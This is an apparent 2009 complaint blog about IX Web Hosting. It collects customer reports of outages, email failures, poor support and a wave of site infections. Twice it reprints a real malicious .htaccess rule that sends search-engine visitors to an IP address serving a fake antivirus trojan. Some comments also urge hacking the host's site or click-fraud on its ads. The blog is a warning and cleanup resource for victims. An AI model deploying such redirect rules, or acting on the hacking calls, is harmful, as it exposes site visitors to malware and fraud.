insecure « IX Web Hosting Warning

IX Web Hosting’s Reviews Feb. 2009

Yellow, 28th 2009f February, 2009

Glad I found this site, was minutes away from purchasing a buisness account. I will now look elsewhere.

Julie, 27th 2009f February, 2009

I think that the likes of Yahoo, Hotmail, Live Mail and Gmail are blocking Emails being sent from web sites hosted by ix web hosting. I had to create a Yahoo email account to snd emails to all the above, because if I send emails from my website email address, no one using a server based email provider such as the one mentioned above, never get the emails I send.. Very unprofessional, I have contacted ix 5 times now, but they just give me a boiler plate answer, there is nothing wrong.

mark, 26th 2009f February, 2009

Hello, What I suggest is that everyone who is having problems with your server, click on their google ads… show them what it feels like when tons of people click on your ads and the server is down. ixwebhosting.com has really bad problems with their servers. My company already moved off of ixwebshosting.com because of the constant server problems we have experienced.

Mike, 26th 2009f February, 2009

Ixwebhosting.com servers are really poorly run and are often down and on error. We made a mistake trusting ixwebhosting.com. Our servers has been down almost 6 times per hour, each outage lasting about 2 minutes.

tommy, 25th 2009f February, 2009

I would like to start a web hosting company and take all your money and then shut down all the servers!!!!! mu ahahahahahahaha

elawcase@gmail.com, 24th 2009f February, 2009

Hello, we continue to receive complaints about ixwebhosting.com. Should we get enough support, we can launch a class action law suit against ixwebhosting for advertising what is not true of their uptime. You can contact us at elawcase@gmail.com.

floristwide.com, 24th 2009f February, 2009

Hello, I cannot believe how terrible the servers are at ixwebhosting.com. It goes down everyday at least 5-10 times. Probably more than that but we catch about 5-10 times a day the outtages. We moved most all our important sites off the server NS13.ixwebhosting.com and NS14.ixwebhosting.com. However, some of our sites are still hosted on this server. You can check it to to see the performance. Our site is www.Floristwide.com and you can test it using alertra.com. You will see that every so often the server will go on error. It’s really frustrating and Ixwebhosting always blames it on other shared hosting sites which is not the solution we want to hear. I have no idea why ixwebhosting is rated high on this website but probably because they pay or promote this ranking. Really frustrating!

Harry, 24th 2009f February, 2009

Recieved an email today from a client saying that if you use the search option it shows an error, spent ages trying to find what the problem was, I then compared the Database Tables with the original, and TWO tables were missing, this site has not been updated for well over 5 months, and it was working fine at least up until 2 weeks ago.
ix wehosting denies they had anything to do with the sudden deletion of the tables.

Ian, 22nd 2009f February, 2009

3 days.. and the server is down…

Brice, 20th 2009f February, 2009

I have 3 websites hosted on ixwebhosting and I have had nothing but problems. They upgrade things and break you and do nothing to fix it. Their support is a joke, sometimes taking days to get problems resolved. I am actively looking for another provider. IXWebhosting is awful.

David, 19th 2009f February, 2009

A note about the .htaccess injection. When it happened (Early December of last year), ixwebhosting sent this email to clients:”This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.”This is not true. It’s an insult to say that I (an experienced internet user) actually downloaded the fake anti-virus program. Access to our FTP accounts was not obtained from our (the clients’) own computers, it was a security flaw on the server end. Just today ixwebhosting sent an e-mail saying that they changed everyone’s ftp passwords, obviously to cover for some more security flaws on their end.

Walter, 17th 2009f February, 2009

Very slow. vulnerable, crappy webhosting with 10-15 seconds page generation time.

David, 17th 2009f February, 2009

I have been with ixwebhosting for about a year and a half. I have had no problems except for the one time when my site (and possibly all the other ixwebhosting sites) were hacked. The .htaccess file was replaced with this:RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]It didn’t hurt me because my website is private and not indexed by search engines anyway, but this is very bad. I will not be staying with ixwebhosting for the long-term. I have had no problems with tech-support though, I’ve used the live chat two or three times (with trivial issues mind you) and have not had to wait more than 10 minutes.

Chris from BBTA, 16th 2009f February, 2009

I see IXwebhosting’s response below… do not contact us it wastes our time… WOW. What a statement. So your customers inquiring about the status of their server that is down and they are most likely losing money and customers is a waste of your time. The is just plain out crap. If you dont care about your customer’s, customer’s then you dont care about your Customer.I have been with IX for over two years, and have a multitude of websites with them. Everything was great for the first, 10 months or so. Then they moved locations, SQL servers go down, or are extremely slow to respond, dns errors, internal server errors, failure to connect to web server errors, errors errors, down, slow, error, down slow. Catch my drift.I am in the market for a new host as I have finally grown tired of daily support tickets, phone calls and chats. Someone point me in a good direction and not godaddy i dont like them either. I am looking at dreamhost but not sure yet.

Laura T, 15th 2009f February, 2009

Support is so frustrating, and useless, 3 days I used the chat support to ask why my pages were suddenly getting a syntac error, I had not made any changes for months, I was told to submit a ticket, so I submitted a ticket 2 days ago, FINALLY today after 2 days I get a response telling me they had recieved my ticket and that it was forwarded to the correct department !!!!??? WHAT!!??
This is the final straw, after reading all the below complaints, and also all the stuff on www.ixwebhostwarning.wordpress.com
I am moving my sites away from ixwebhosting

Rob Stallard, 15th 2009f February, 2009

The actual service is adequate. However, they fail to deliver on technical support. On two occasions I have waited 2 days for just an initial response. They are unhelpful on chat – they just say the problem will be looked into soon – and don’t do so. Support is a network of Russians as far as I can tell. Unapologetic and unhelpful and very frustrating as there is no way a crucial techincal issue will get looked into in a timely fashion.

Chris, 13th 2009f February, 2009

My SQL servers are down yet again. If you talk to the online chat they will tell you nothing is wrong. IF you submit a ticket they give you a BS response. However I just called them and was honestly told (Spoke to a real tech support person not “Jeff” in freaking Pakistan) that they had a hardware failure last night and they dont know when it will be back up. And that 501 has had some issues here lately but with the replacement of the hardware this should be fixed. We will see where this leads. I dont want to change host because it is a HUGE PITA. But if I have to I will.

Ex IX customer, 12th 2009f February, 2009

Could somebody please hack the .htaccess file on www.ixwebhsoting.com. Please set it to divert everyone to a decent hosting company!Funny how their own site never gets hacked! Please, please, please… Somebody please hack their site to see how they like it.

Wallace, 12th 2009f February, 2009

All site is down now for ixwebhosting.You try go their website which down now.My website is down also.After see all your comment,i am worry now.Don’t know when will be up again.

Shira, 12th 2009f February, 2009

We’ve spent the last week uploading and creating database on our new IXWebhosting account. BIG MISTAKE. All of the database sites give random server connection errors more often than not and the server service in general is extremely unreliable. The online “Tech support” chat is a complete joke. Not once have they been able to resolve the problems we’ve communicated, and we have to chat them about 5 times a day. We’re closing our account today before serious damage is done.

Pete, 11th 2009f February, 2009

AVOID like the plague!!!
Every one of their web servers have been hacked in the last few months. If you have any sites with them, it’s just a matter of time before your code is injected with viruses and phishing pages or completely diverted to a scam web site.
If you have an account with them, do what I did… Get the hell out now before all of your sites are blacklisted.
Try www.a2hosting.com. They cost a bit more but you get what you pay for.

Chris, 10th 2009f February, 2009

From all the research I have done over the past months, i have never seen so many angry people and complaints as the ones complaining about ixwebhosting
IX is a lost case.. AVOID

FUCK YOU IX, 10th 2009f February, 2009

I’m so sick of the feeble excuses ix web hosting come up with.
I the past week I have called them at least 3 times everyday because so far my sites have been down on average 3 hours a day. Everytime I get to hear how sorry they are, and that the issue will be fixed within 20 minutes!!
It really is time to get a class case together and sue IX for compensation.

Erik, 09th 2009f February, 2009

All 12+ of my domains were down much of Feb. 7, 2009, and since at least the afternoon of Feb. 8, 2009, they’ve been down again, and all of my sites’ files are totally gone. They’re “still working” as of this morning, Feb. 9, 2009, but they cannot say much more. Time to move on.

Milano, 09th 2009f February, 2009

Today I got a call from a friend telling me my sites contained a virus, I googled my site, and when I clicked on it my Anti Virus blocked it with a warning, I then checked all my other sites and they all contain the same script. I called ix, had to wait 25 minutes, probably a lot of customers with the same problem.. I was told very bluntly that it was a well known issue with WordPress, I have been using wordpress now for 4 years, and always use the latest stable version, I contacted WordPress, and they assure me that there are no known issues with WordPress. I then called ix again, and this time they blamed my computer, saying it is infected, and that I uploaded the virus.
IX is an absolute nightmare, and I am moving all my sites away from them, and I will file a complaint with the BBB

Herman, 08th 2009f February, 2009

Last week I had a phone call from a customer why I had not sent them an Email, I reassured them that I had, and that I would resend it 2 days later completely pissed off because they still never got the Email. So I sent an Email to one of my own Email accounts.. I never got it, so I tried sending it to another 5 Email accounts.. out of those 5 emails I got just ONE, but it took TWO days to reach me. I contacted support on the chat, and he told me there was a backlog of mail because of a “Spam Filter” , he told me to create a Ticket which I did, I sent a ticket on Friday morning, and Today ( Monday) I still have not had a response.
So to break it down, ( this is what I know for certain) I have sent 8 emails, and only recieved ONE 2 days after I sent it!
This is absolutely absurd, now I do not know how many people I have sent Emails to that never got them.
Do yourself a big favour and stay away from ix web hosting, they just have not got a clue, or they just don’t care, or both.

elawcase@gmail.com, 07th 2009f February, 2009

Anyone interested to sue ixwebhosting.com due to their bad servers and not providing what they promise, please contact us at elawcase@gmail.com.I have tried many hosting companies and ixwebhosting is amongst the worst. Their server will go down frequently. We received so many complaints from our own customers that the website is not working. We get this just about everyday. And two days ago ixwebhosting.com servers were down for 4 hours. Yesterday it was down 3 hours. Today it is down now for over 2 hours and we are still waiting for the servers to work. We are hosted on NS13, NS14. This has got to be the most frustrating experience in our 9 years in ecommerce. We made the fatal error trusting to host our site with ixwebhosting.com. The first two months were okay but then after it went downhill. I think maybe they work really hard during the trial period so you cannot refund the month. I’m stuck now with a long period of webhosting plan. They won’t refund either and they will not provide you a good working server.

Matt, 07th 2009f February, 2009

Hello, THE SERVER IS DOWN AGAIN. Two days ago it was down for 4 hours then yesterday 3 hours.. now today it has been down for over 2 hours. I need a working server. ixwebhosting has the worst servers possible. So much downtime. They wont refund you either.

Help!, 05th 2009f February, 2009

Hello, can someone tell me what to do? ixwebhosting.com server has been down again and again. This is at least the 10th time in the last 12 hours. What is happening? This is our 5th complaint with them but they are not fixing it. It will maybe work for 1 hour then go back on error.

Richard, 05th 2009f February, 2009

Oh my GOD! The server is down again.. I’m going to move my websites ASAP.. ixwebhosting really sucks… we have to complain every day. I’m sure they have so many compplaints. Their servers are maybe just poorly managed. But it’s bad.

Richard, 05th 2009f February, 2009

Hello, I just checked the server. It is now working but after 4 hours of downtime. This is really unprofessional hosting. It’s cheap but you really get worse than what you pay for. Ixwebhosting.com is cheap and bad. I would rename it ixwebrobbing.com

John – HELP SERVER DOWN, 05th 2009f February, 2009

Hello I cannot believe how many times the server is down.. It has been down for over 1 hour and now they are telling us another hour. This server really sucks.. here’s the chat logs.Lesya Geychenko: Sorry, we really experience some problems on our server, but I want to ensure you that this is temporary and we will fix them as soon as possibleyou: pls .. it has been down for 1 hour

you: every day down

Lesya Geychenko: I am so sorry, our admins are working on the issue

Lesya Geychenko: Sorry, we do not have any ETA yet, the issue will be fixed as soon as possible

you: we have to contact ixwebhosting just about everyday about the servers being down.. this is not the service we have paid for

Lesya Geychenko: I understand your concerns about this, you can create a ticket and provide statistics on the server side issue and ask for permanent solution

you: we have already

you: what’s going on?

you: over 1 hour

you: hello, any updates so far?

Lesya Geychenko: Yes, our admins are working on the issue, they will send a notification to me when they finish

you: please

Lesya Geychenko: The issue should be fixed within 15 minutes

you: ok

Lesya Geychenko: I am extremely sorry to tell you, I just got the news from our admins

you: ok

Lesya Geychenko: They maintain the server longer than I have expected

Lesya Geychenko: The server will be up in 60 minutes

you: ixwebhosting is really unreliable…..

ixwebhosting.com, 05th 2009f February, 2009

Hello we understand our server is down for about 1 hour. We will fix it as soon as possible. Please do not bother us with your enquiries because it wastes our time. We are trying our best. If you don’t like it, please do not contact us or join our excellent web hosting server. You can see on this website we are rated very high. We are not interested in people just complaining and bothering us about our servers. We know it is currently experiencing problems but we will fix it!

Heidi, 03rd 2009f February, 2009

Just got off the phone with ix, for the past 2 weeks every evening at 6 o clock my sites stop loading, and I cannot retrieve my Emails. It is so frustrating that the support just say that everything is working fine. I’ll be looking to move my sites.

Matt, 02nd 2009f February, 2009

The server is currently down. IT is down about every 5-10 minutes for 30 seconds – 2minutes. Right now it has been down for over 10 minutes. We need to get to our database and info but we can’t. This is just bad for us. ixwebhosting.com really cannot get it right. We have contacted them over 100 times in the past month but they keep saying they fixed the problem. I don’t see how ixwebshosting rating is high on the right menu on this website. It means they probably get some cut when referring clients.

March 1, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, innocent customers, insecure, malicious files, pathetic, promise, terrible, unhappy, unprofessional, unreliable, www.ixwebhosting.com | 1 Comment

Tip from a reader “How to clean the Yahoo Counter Injection Script”

Hey buddy,
nice website, i wish i had seen it before I renewed my contract with the crooks at IX for 2 more years…
well, i am writing because i couldn`t find on your website a solution to clean the infections automatically. so maybe you want to post a solution:

here is what I did:

1 – download the entire site
2 – Open an infected file with Adobe Dreamweaver
3 – Look for the infected code, select all of it and copy it to the clipboard (starts with “<?php if(!function_exists(‘tmp_lkojfghx’))…”). You must copy ALL the code!
4 – Still on dreamweaver, click on EDIT>FIND AND REPLACE
5 – on the FIND box you paste the infected code
6 – On the FIND IN dropdown select FOLDER and point it to the folder where your website was downloaded.
7 – click on REPLACE ALL (dreamweaver will replace the code with whatever is on the REPLACE box, as we didn’t write anything there, it will clean the code)

I found out that all the infected files on my sites had exactly the same code, so it was quite fast to remove them.

Ivan

Thanks Ivan for your feedback, I hope this helps others, also sorry to hear your sites are still constantly being injected. It’s clear that IX Web Hosting still has not got a clue how to solve this issue, and on top of this they are having 3 other mayor issues to deal with.

February 13, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, hackers, hacking, iFrame injection, injected script, insecure, unprofessional, unreliable, yahoo counter | 6 Comments

IX Web Hosting has SERIOUS database Issues and lots more

In the past months, 1000’s of IX Web Hosting’s customers finally turned their back on the “Cheap, Unreliable and Insecure ” Web Host. This was due to the fact that more than 140,000 sites were hacked and injected on a WEEKLY bases, things got so bad that even the “Backups” were infected and deemed useless.
From May 2008 onwards IX Web Hosting continueously blamed their customers, mayor search engines, WordPress, Joomla, and every script on the market, actually, it was everyone’s fault, except IX Web Hosting.

The past 4 weeks I have recieved and seen an alarming amount of customers furious about the “Downtime” of their sites.

Downtimes of 6+ hours is normal…

I am curious who IX WEB HOSTING is going to blame this time

Shira, 12th 2009f February, 2009

Pete, 11th 2009f February, 2009

AVOID like the plague!!!
Every one of their web servers have been hacked in the last few months. If you have any sites with them, it’s just a matter of time before your code is injected with viruses and phishing pages or completely diverted to a scam web site.
If you have an account with them, do what I did… Get the hell out now before all of your sites are blacklisted.
Try www.**********.com. They cost a bit more but you get what you pay for.

F**K YOU IX, 10th 2009f February, 2009

Erik, 09th 2009f February, 2009

Milano, 09th 2009f February, 2009

Herman, 08th 2009f February, 2009

elawcase@gmail.com, 07th 2009f February, 2009

Anyone interested to sue ixwebhosting.com due to their bad servers and not providing what they promise, please contact us at elawcase@gmail.com.

I have tried many hosting companies and ixwebhosting is amongst the worst. Their server will go down frequently. We received so many complaints from our own customers that the website is not working. We get this just about everyday. And two days ago ixwebhosting.com servers were down for 4 hours. Yesterday it was down 3 hours. Today it is down now for over 2 hours and we are still waiting for the servers to work. We are hosted on NS13, NS14. This has got to be the most frustrating experience in our 9 years in ecommerce. We made the fatal error trusting to host our site with ixwebhosting.com. The first two months were okay but then after it went downhill. I think maybe they work really hard during the trial period so you cannot refund the month. I’m stuck now with a long period of webhosting plan. They won’t refund either and they will not provide you a good working server.

John – HELP SERVER DOWN, 05th 2009f February, 2009

Hello I cannot believe how many times the server is down.. It has been down for over 1 hour and now they are telling us another hour. This server really sucks.. here’s the chat logs.

Lesya Geychenko: Sorry, we really experience some problems on our server, but I want to ensure you that this is temporary and we will fix them as soon as possible

you: pls .. it has been down for 1 hour

you: every day down

Lesya Geychenko: I am so sorry, our admins are working on the issue

Lesya Geychenko: Sorry, we do not have any ETA yet, the issue will be fixed as soon as possible

you: we have to contact ixwebhosting just about everyday about the servers being down.. this is not the service we have paid for

Lesya Geychenko: I understand your concerns about this, you can create a ticket and provide statistics on the server side issue and ask for permanent solution

you: we have already

you: what’s going on?

you: over 1 hour

you: hello, any updates so far?

Lesya Geychenko: Yes, our admins are working on the issue, they will send a notification to me when they finish

you: please

Lesya Geychenko: The issue should be fixed within 15 minutes

you: ok

Lesya Geychenko: I am extremely sorry to tell you, I just got the news from our admins

you: ok

Lesya Geychenko: They maintain the server longer than I have expected

Lesya Geychenko: The server will be up in 60 minutes

you: ixwebhosting is really unreliable…..

Heidi, 03rd 2009f February, 2009

Matt, 02nd 2009f February, 2009

George , 30th 2009f January, 2009

If you are planning to run a serious website, DO NOT use Ix web hosting, they are more trouble than they are worth. Virus, Slow, Database problems, and Email issues.

February 12, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, hackers, idiots, iFrame injection, infected, injected script, innocent customers, insecure, malicious files, unprofessional, unreliable | No Comments Yet

Daily Top 10 Searches to this blog

As of today I am going to post the TOP 10 Search Engine Terms people use to find this site.

As you will see, there are a lot of issues going on.

Search Engine Terms

These are terms people used to find this blog.

Todays Search

ix hacked
ixwebhosting virus
ixwebhosting hacked
ixwebhosting
ix webhosting hacked 2008
http://ixwebhostwarning.wordpress.com/
ix web hosting has been hacked
http://ixwebhostwarning.wordpress.com
ix webhosting htaccess
ixwebhosting .htaccess hack

Yesterdays Search

ixwebhosting hacked
ixwebhosting malware
ixwebhosting malicious
fix ixwebhosting .htaccess
modlogan hacked
htaccess exploit passwords ixwebhosting
ixwebhosting exploited
how to remove yahoo counter injection fr
access htaccess ixwebhosting
ixwebhosting hack

February 8, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, injected script, insecure, IX Web Hosting, unhappy customers, unprofessional, unreliable, yahoo counter | No Comments Yet

Join forces to SUE IX Web Hosting

[ from an ix webhosting customer ]

Anyone interested in joining forces to sue ixwebhosting.com due to their bad, insecure servers and not providing what they promise, please contact us at elawcase@gmail.com

February 8, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, Ecommerce, iFrame injection, injected script, insecure, unprofessional, unreliable | 1 Comment

IX Web Hosting still blames 777 permissions

Hundreds of unhappy IX Web Hosting Customers are contacting me, telling me they are still being blamed for the Yahoo Counter Script Injection and the .htaccess hack.

IX is blaming ” Folder Permissions “ saying 777 should not be used, and in the case that NO FOLDERS are being used, they turn to the ” Ftp Virus” BOTH of these are complete rubbish and LIES, and if you corner an IX Web Host manager with some facts and a bit of knowledge they will admit that it IS an issue on the ” IX Servers”

I have been PERSONALLY told by THREE MANAGERS.. Kenny, Drew and Lauren that IX is aware that they have security issues, and each time they assure me that the problem will be fixed soon, that was 9 months ago!!
The problem has not been solved, and is nowhere near being solved, actually it is getting worse.
Almost 10 months ago the problem was the iFrame Yahoo Counter was injected into every file, today the problems are numerous 3 different injections and a .htaccess hack!! on both the php4 and php5 platform.

So, why is IX Web Hosting admitting they have issues to certain people, and LIEING to others? The reason to this is because the Support Monkeys have been told to NEVER admit that IX has issues, if the monkeys admitted to every customer that it was due to IX’s security issues that more than 120.000 sites were being infected on a weekly basis, all hell would break loose and somewhere along the line someone would sue.
So, as of yet for as far as I know it is only certain managers that are admitting to certain people, that IX is to blame.

IX Web Hosting blames 777 folder Permission!!!… Do me a favor!!, it’s 2009, HUNDREDS OF MILLIONS of people are using Open Source CMS (content management system ) such as WordPress, Joomla, Drupal etc..etc..
Many of these scripts will not work without 777 permission ( images, templates etc)

If in 2009 IX Web Hosting cannot host a CMS site without it getting injected or defaced, then they are NOT FIT to host websites and should pack their bags and leave town … for good!!

Why is it, that IX has a page on their website that explains in detail how to install and use WordPress and Joomla, but they still blame customers for using these CMS scripts.

Next time you speak to an IX Support Monkey ask them how the following is possible

5 html sites ( 100% html) not running any scripts or folders get injected?
How is it possible to MASS overwrite 644 files (.htaccess)
How is it possible to MASS add .htaccess files
Why is it, that if I did have an Ftp Virus, they only inject 2 buisness accounts, when they would have access to all 4?.. Why dont they inject all 4?
Why is it only IX Web Hosting and Host Excellence ( owned by ix web hosting) are having these problems? if it was a 777 folder permission issue 100’s of Millions would be affected, and EVERY webhost in the world would have the same problems.
ANY Server Side injection of 1000’s of sites is surely the responsibility of IX, and NOT a Folder Permission issue.. I have access to all my folders, but there is no way that I can access someone elses site.
It’s clear that this issue is server root related.

One more thing, a 777 folder used by the likes of WordPress or Joomla ARE SAFE!!.. Does IX Web Hosting really believe that they can carry on blaming customers? MORE THAN ONE THIRD of ALL IX Web Hosting sites are infected!!… More than 120.000 sites infected !!

January 23, 2009 Posted by neverixweb | IX Web Hosting | 777, 777 folder permission, AVOID IXWEBHOSTING, customers, disater hosting, folder permission, hacked, hackers, hacking, idiots, iFrame injection, injected script, innocent customers, insecure, liars, malicious files, pathetic, root, server, unprofessional, unreliable | 3 Comments

Is YOUR site INFECTED by the Yahoo Counter or .htaccess

A lot of people are contacting me, asking HOW you would know if your site is infected?.
Let me start by saying that in some cases you will know immidiately when somthing is wrong, but in other cases it might not be too clear.

The YAHOO COUNTER SCRIPT

Click Image to Enlarge

is an iFrame Javascript injection that injects code into the Footer, Body, or Header, or all three at once.
Thousands of IX web Hosting customers are infected with this code, and they do not even know it! The web Page looks normal, but this can be very dangerous, your website will eventually drop from ALL the mayor search engines, and your domain will be flagged as “Dangerous Malware” by all the search engines.
To check if you have the Yahoo Counter injected, visit any search engine, and visit your site, If your site loads as it should, BUT it still shows “Loading” in the taskbar for some time, and then in most cases ( but not always) an ” Acrobat Reader” Error message will pop up.

Now you must Check the “Source Code” ( Menu Bar –> View –> Source ) and you will notice the Code that has been injected.

The .htaccess Injection

This is a very sneaky Injection, the reason being, is because most people that have and check their websites, access them by either a shortcut, or directly through the search bar by using the url, In both these cases, your website will be perfectly normal, BUT, anyone trying to access your website through any of the mayor Search Engines, will be re-directed.

fakeav

Click Images to Enlarge

Once that is done, a FAKE ANTI VIRUS will pop up, and start scanning your PC, it will then alert you that you have dangerous files on your PC, and if they should be removed, if you click YES, you are screwed!!, a Trojan with KeyLogger will be executed on your PC, and you are INFECTED!!…

Anyone who has the FAKE ANTI VIRUS pop up, should just click off the site NEVER click “Yes” or “No”.. just click OFF the page , if your PC freezes, use “Ctrl-Alt-Delete” and Stop the process… then out of precaution you can “Delete” your cached internet files.

An example of the injected .htaccess file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* h**p://87.248.180.89/topic.html?s=s [R,L] ( link altered by ME )

Remember, you only get re-directed if you click on your url from a search engine

January 11, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, customers, hacked, hackers, hacking, iFrame injection, infected, injected script, insecure, malicious files, unhappy, unreliable, virus | 2 Comments

IX Web Hostings Servers using both Php4 and Php5 INFECTED

infectedx

As I wrote yesterday, MORE THAN ONE THIRD OF ALL IX Web Hosting’s hosted sites are INFECTED.
And to make things worse, the problem is spreading.
Up until Jan. 3rd 2009 it was only the older servers still running Php4 that were being affected, but now even the NEW server blocks, running Php5 are being injected.
IX Customers with sites on the server block with mysql address mysql501.ixwebhosting.com that runs php5. are being injected.

This is bad enough, and the fact that after 9 MONTHS!!! IX Web Hosting has still NOT GOT A CLUE how this is being done is a complete DISGRACE!!
And to add salt to the wounds, IX is not just being attacked with one form of iFrame injection, NO, IX is being attacked THREE different ways.
1) The notorious ” YAHOO COUNTER” is being injected into the FOOTER of every file.
2) The .htacces File that is overwriting and / or adding an . htaccess file into the root of every site and re-directing sites
3) As of Jan. 3rd 2009, a SECOND but modified version of the ” YAHOO COUNTER ” iFrame injection is now being injected into BOTH the Header, AND / OR Body of every file.

Today an IX Web Hosting customer sent me a link to their site, that was injected with THREE Yahoo Counters, Header, Body and Footer.
The owner of the site told me that the site would take ages to load, and would often even timeout, and Google had dropped the site completely from the Search Engine, penalized because of the “Malware Script”

Here is a quote from IX Support’s Alex Karamushko :

We have currently problem with Yahoo counter hack, but our system administrators and security analysts working hard for finding exact reason of that problem and we can assure you that this will be fixed shortly.

After 9 months, I ask myself what ” shortly” actually means?!.. Another week?, month?, or maybe 3 months?.. because I was told by “AGENT IX” that at the rate things are going now, by May 2009 EVERY website hosted at IX will be infected by these injections.

January 11, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, customers, hacked, hackers, hacking, iFrame injection, infected, injected script, innocent customers, insecure, lies, malicious files, terrible, unprofessional, unreliable, yahoo counter | 13 Comments

IX Web Hosted sites Hacked & Defaced Jan 9th 2009

http://efamili.com/

http://dabasan.com/beads/archive.php

http://www.capetowntips.com/

http://icaav.com/phpBB2/

http://buildingwithtyres.com/

http://www.mortgageservices.com.au/

http://terrybeitel.com/

http://ebookdirectory.net/

http://www.strangeauction.com/

http://annualkellyfamilyreunion.com/forum/

http://www.scotlandsguesthouses.com/

http://www.themerchfoundry.co.uk/helpcenterlive/

http://mediaportalen.net/

January 9, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, hackers, hacking, infected, injected script, insecure, malicious files, pathetic, unreliable | No Comments Yet

More than ONE THIRD of ALL IX Web Hosting sites INFECTED

A lot of the information I post here, I get from a person that works for IX Web Hosting and / or Ecommerce, as you all understand I cannot give any details that could compromise his / her position. I will call this person “AGENT IX”

Today I recieved an Email from “AGENT IX” that states that more than 100,000 IX Web Hosting Sites are infected.

The Details are, that IX Web Hosting is hosting 285,223 websites ( source http://whois.domaintools.com/ixwebhosting.com

More than 100,000 sites are infected, which means that more than 1/3 of all IX Web Hosting sites are infected!!
and IX has still not got a clue how to stop these attacks.

Also the injected script(s) are changing ( see previous posts) which most likely means that this vulnerability is now being exploited by various people / groups, and this also means that this problem is going to get a lot worse before it gets better, this problem has now been effecting sites since last year May ( 2008 ) almost 9 MONTHS LATER the problem is worse than it has ever been, and there is no bright light at the end of the tunnel yet.

January 8, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, hackers, idiots, iFrame injection, infected, injected script, innocent customers, insecure, lies, unreliable, yahoo counter | 4 Comments